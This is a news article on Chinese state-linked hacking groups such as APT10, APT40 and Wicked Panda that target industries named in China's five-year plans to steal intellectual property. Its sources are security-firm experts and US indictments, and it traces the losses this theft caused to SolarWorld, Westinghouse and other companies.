Chinese hacking groups to ramp up cyber attacks on some industries, experts say

Since 1953, the Chinese government has issued official five-year plans. Each plan outlines the economic development goals and the main drivers that will help the country achieve those ambitions. They also act as advance warning of industries hacker groups will likely target.

This was the case with the 12^th plan and is the case with the current 13^th. With work for the 14^th plan likely underway, a new group of industries could find themselves under attack from a number of sophisticated hacker groups. “Organizations need to understand how they are viewed by their adversaries and in the case of nation-states such as China how attractive are their personnel, locations, data and core intellectual property to those states,” warns Adam Meyers, VP of intelligence at CrowdStrike.

A shopping list for hackers

The current five-year plan runs until 2020. In it, the People’s National Assembly of China set out goals around making China a “moderately prosperous society,” including 6.5 percent annual gross domestic product (GDP) growth, increasing domestic R&D, achieving climate goals and bringing more people out of poverty.

The 13^th plan also included the “Made in China 2025” policy, which laid out the key industries in which the Chinese government is focused on becoming a world leader. These industries include;

• Information technology
• Robotics (including AI and machine learning)
• Green energy and green vehicles
• Aerospace equipment   
• Ocean engineering and high-tech ships  
• Power equipment          
• New materials  
• Medicine and medical devices   
• Agriculture machinery
• Railway infrastructure

At the time of that plan’s announcement, CrowdStrike warned that companies working in these industries would likely suffer more cyberattacks from China-affiliated hackers — much the same as with the 12^th plan — in an effort to steal intellectual property (IP), accelerate goals and reduce the country’s dependency on foreign firms for technology, equipment and infrastructure.

While there have been cyberattacks against major corporations since then, there have not been as many as some expected. This is due in part to an agreement in 2015 between U.S. President Obama and Chinese President Xi Jinping that neither country would “support cyber-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.”

The agreement coincided with a reorganization and modernization of the Chinese People’s Liberation Army and the creation of the People’s Liberation Army Strategic Support Force, which houses operations around space, cyberspace and electronic warfare.

“Most of the cyber-capable units notably the 3^rd and 4^th General Staff Department (GSD) where the publicly attributed units (1^st Bureau was the APT1 unit designated 61398, 12^th Bureau was identified by CrowdStrike as Putter Panda in 2014), were reorganized into the PLASSF and Network Systems Department (NSD),” explains Meyers. 

Trade war brings new attacks

The ongoing tit-for-tat tariffs, plus repeated warnings from U.S. officials over Huawei’s relationship with the Chinese government and its role in 5G, have strained relations between the two countries and attacks have increased.

“Now that there’s geopolitical pressure and the trade wars, we’ve seen a resurgence [in attacks]. All these groups are active again. They were less active and now they’re at full speed again,” says Otavio Freire, CTO of threat monitoring service SafeGuard Cyber. “You can only attribute it to the trade wars. The timing is suspiciously too coincidental that when relations were good, there is less attacks by the advanced persistent threats from China.”

A survey by CNBC found that one in five U.S. companies have had their IP stolen by China in the last 12 months. “In 2015, China promised to stop stealing trade secrets and other confidential business information through computer hacking with the intent of providing competitive advantages to companies or sectors,” Deputy Attorney General Rod Rosenstein said in a press conference announcing the indictment of two Chinese men connected with the APT10 hacking group. “The activity alleged in this indictment violates the commitment that China made to members of the international community.”

As the cyber-détente has come to an end and the reorganization of the PLA has settled down, hacker activity is turning its focus back to the goals of the five-year plan. “The downturn in Chinese targeted intrusion activity observed in the wake of the 2015 agreement between China and the U.S. with regards to commercially motivated cyber-espionage appears to have been reversed,” says CrowdStrike’s Meyers. “Over the last year, CrowdStrike Intelligence has observed an increasing operational tempo from China-based adversaries. The threat of 25 percent tariffs on more than $50 billion worth of Chinese goods may be driving some of the recent activity.”

Multiple industries at risk

The 10 industries mentioned in the plans face attacks from threat actors with differing skillsets. The first group Meyers mentions is Wicked Panda (also known as APT17, Winnti Group, Tailgator Team, Deputy Dog and others), which has been active since 2009. “Wicked Panda has been linked to numerous incidents involving a broad set of targets including organizations in the mining, technology, manufacturing and hospitality sectors,” he explains. “The scope for this adversary group suggests they are contractors supporting high-priority operations as needed.”

“[In its most recent attacks] the actor compromised a running SQL Server process and attempted to upload and execute an open-source PowerShell Empire implant, which was intended to open a reverse TCP shell to the adversary-controlled domain,” Meyers says.

Other groups of note include APT10 (aka Menupass Team, Stone Panda), a Chinese Ministry of State Security (MSS)-affiliated group active since at least 2009 and targeting construction, engineering, aerospace, telecom and government. Known to use the Haymaker, Snugride, Bugjuice and Quasarrat malware families, the group leverages both traditional spear phishing and managed service providers — including IBM and HPE, according to Reuters— to gain access to victims’ networks.

APT40 (aka Periscope), according to FireEye, has been active since 2013 and is thought to be dedicated to China’s naval modernization effort and the country’s Belt and Road Initiative. It is known to target engineering, transportation and defense companies with maritime links across the U.S., Europe, South East Asia and the Middle East. It has been observed impersonating an unmanned underwater vehicle (UUV) manufacturer and targeting universities engaged in naval research.

A report from the U.S.-China Economic and Security Review Commission into Biotechnology says there have been at least six attempts by Chinese actors to remove IP from medical companies, including robotic surgical equipment, cancer treatments, treatments for organ recipients, cornea regeneration, hepatitis C diagnostics and an anemia drug. Multiple attacks in the agriculture industry involved attempts to steal genetically engineered rice or corn seeds, while other thefts have targeted organic pesticides, engineered food products and livestock feed supplements.

SafeGuard Cyber tells CSOit has seen also a large amount of activity in the aerospace sector. “They want their own Boeing,” says Freire. “They want to stop buying from the United States.”

As well as APT groups, numerous insider attacks have targeted high-tech companies. In October 2018, the U.S. charged two alleged Chinese intelligence officers of attempting to steal IP and confidential business data — including information related to a turbofan engine used in commercial airliners — from aerospace companies.

Smaller hacker groups with no obvious or official ties to the Chinese government are also a threat. “It works more like a loosely coupled criminal enterprise than ‘everything is state sponsored’,” says Freire. “It is very network driven the attacks and it’s not centralized. Entrepreneur hackers approach a politician in a relevant department and say, ‘I have some information here, will you pay for it?’ China’s been able to create this environment and say, ‘We’re open for business. If you accomplish these objectives, we will pay for it.’”

Targeted industries face real consequences

Losing valuable IP to a competitor can be devastating; the full extent of the damage is often only seen years later. APT1 (aka the Comment Group), identified as Unit 61398 within the PLA, was attacking companies as far back as 2006 and is affiliated with the GhostNet, Aurora and Shady RAT campaigns. Companies named in a 2014 US indictment as being victims of APT1 include SolarWorld, Westinghouse Nuclear and ATI Metals. The Financial Times reports that these attacks, in turn, helped boost Chinese aluminum company Chinalco, steelmaker Baosteel and nuclear power firm SNPTC.

“Intellectual property is really the lifeblood of these organizations,” says Freire. “The long-term consequences are for those countries and companies that were at the forefront of science and technology had that competitive advantage, that is lost forevermore. But it’s slow moving, so the consequences [of losing IP] are not as obvious.”

Those companies haven’t done well since they were hacked. German solar energy company SolarWorld was hacked in 2012 and filed for insolvency in 2017 (though the U.S. subsidiary is still in business and was recently acquired by SunPower).

“While the five Chinese military hackers have never been brought to justice in this country,” SolarWorld CEO Juergen Stein said in a recent testimony. “We firmly believe that were it not for their economic espionage and theft from SolarWorld Americas, Chinese solar producers like JA Solar and Trina would have taken far longer to make the leap into PERC [Passivated Emitter and Rear Cell, a newer type of solar architecture] technology.”

Westinghouse, which designs and constructs nuclear power stations, lost sensitive emails and confidential proprietary technical and design specifications for piping within nuclear plan designs. Like SolarWorld, the group filed for bankruptcy in 2017 before being sold to Brookfield Business Partners in January 2018.

“Can you imagine how frustrating it would be,” says Freire. “You are Westinghouse, pursuing a nuclear deal, you’ve spent years with a government, you bid a price, explain what your differentiators are, and here comes another proposal that is a better financial model that addresses your differentiators.”

“To come up with a reactor design, it is hundreds of millions of dollars, 15 years in the making. If you steal that, it’s not just that you’ve gathered a full nuclear plant design that costs hundreds of millions, but also the time to market. The 15 years that it took to get to that pinnacle of nuclear design is the long-term geopolitical consequence.”

Though they never went in into bankruptcy, ATI, along with aluminum company Alcoa and US Steel — two other companies named as victims in the 2014 indictment — have seen their share prices drop substantially as their competitive advantage has eroded. US Steel recently lost a trade secrets case with the U.S. International Trade Commission (ITC) against Chinese steel manufacturers, in which US Steel said it had seen valuable trade secrets stolen by the Chinese government and ‘used to produce advanced high-strength steel that no Chinese manufacturer had been able to commercialize before the theft.’

“They’ve been very successful. These industries came from nowhere and are now cutting-edge competitive industries from China,” says Freire. “China’s appropriated themselves of something that is so incredibly valuable that changes the trajectory of markets and is able to fast forward to the future when they get this information.”

The 14^th plan is coming soon

The South China Morning Post has reported that work is underway for the next 5-year plan, which will run from 2021 to 2025. As well as likely continuing to target companies in sectors mentioned in the Made in China policy, any new industries the next plan highlights will likely face increased interest from threat actors trying to steal their IP.

“The 12th five-year pan was a veritable shopping list for Chinese intrusion groups during the 2011-2015 time frame, which they largely fulfilled,” says CrowdStrike’s Meyers. “The 13th five-year plan, which is currently in progress, has a focus on some fairly broad targets.”

“It is likely that China continues to see cyber espionage as a means to further enhance and develop the economy. Given the current Chinese efforts to be a leader in 5G and advanced communications technologies, I imagine there will be quite a focus on software and hardware in that arena [in the 14^thplan],” says Meyers.

Quantum computing, machine learning, AI and communications will likely continue to be of focus, Meyers warns, as will medical technology (particularly in digital healthcare and preventative medicine) and previously targeted industries such as biotech, defense, mining, pharmaceutical, professional services, transportation and aerospace.

He adds that China’s Belt and Road Initiative, which sees the country making large infrastructure investments around the world to create a 21^st century version of the Silk Road trading route, will also likely serve as a driver for intelligence collection.